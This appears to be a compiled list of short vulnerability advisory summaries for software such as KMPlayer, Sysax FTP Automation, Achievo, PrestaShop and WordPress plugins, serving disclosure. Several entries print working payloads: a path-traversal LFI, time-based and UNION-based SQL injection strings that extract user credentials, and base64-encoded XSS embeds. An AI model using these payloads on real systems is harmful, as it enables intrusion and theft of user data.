All sensitive functions are lacking CSRF protection. One example below is a request showing no authorization token is required for the creation of a FTP user called 'fun'. This could also be used to deliver both XSS and SQLi examples. The 'inFullname' parameter is vulnerable to XSS. User's real name is not being sanitized as it displayed within the control panel. The 'inDestination' parameter is vulnerable to SQL injection. The 'inPassword' parameter is vulnerable to a password reset attack.
A buffer overflow vulnerability exists in The KMPlayer v3.3.0.33 which can be exploited by malicious people to compromise a user's system. A DLL hijacking vulnerability is also present which can be exploited by malicious people to compromise a user's system. Successful exploitation of the buffer overflow vulnerability requires that a user is tricked into opening a specially crafted file. Successful exploitation of the DLL hijacking vulnerability requires that a user is tricked into running the application from a malicious directory.
Sysax FTP Automation <= 5.33 has a privilege escalation vulnerability. This can be exploited by leveraging the Scheduled Script -> Scheduled Task functionality. The scheduled task function allows you to run any external program/execuable you want, without specifying credentials. By default, this product installs under the LOCALSYSTEM service so when the binary is executed, it runs under that context.
A stack exhaustion vulnerability exists during the handling of the pdf files, which can trigger a denial of service condition.
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the WordPress catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. The error occurs when sending product reviews "view=showproduct" allowing the attacker to send code to your liking, not $_POST validate the form this code is stored in the db.
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in version 1.4.5. XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString) LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3 SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
When installing and analyzing PrestaShop on a secure environment it was discovered that it's possible to bypass isCleanHtml() function, used in many places, in this case in particular the Contact Form. A user could use this vulnerability, a Persistent Cross-site Scripting, to execute malicious payloads on admins message box. Proof of concept: In the message field a user could write: <object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0Pg=='></object> or <embed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIndlYnNlZ3VyYS5uZXQgeHNzIik7PC9zY3JpcHQ+PC9zdmc+' type='image/svg+xml' AllowScriptAccess='always'></embed>. Both Base64 strings are mainly <script>alert()</script> encoded.
SQL Injection was found in ChangUonDyU Advanced Statistics. Query on ajax.php. Exploitation: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20 or: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user where userid=1-- -&result=20
Wordpress All Video Gallery 1.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'vid' in the 'config.php' file. This can allow the attacker to gain access to the database and extract sensitive information.
The Konqueror web browser is vulnerable to a number of memory corruption vulnerabilities. This advisory comes in 4 related parts: 1) The Konqueror web browser is vulnerable to type confusion leading to memory disclosure. 2) The Konqueror web browser is vulnerable to an out of bounds memory access when accessing the canvas. 3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading to a crash. 4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when the context menu is used whilst the document DOM is being changed from within Javascript.
Services By CQR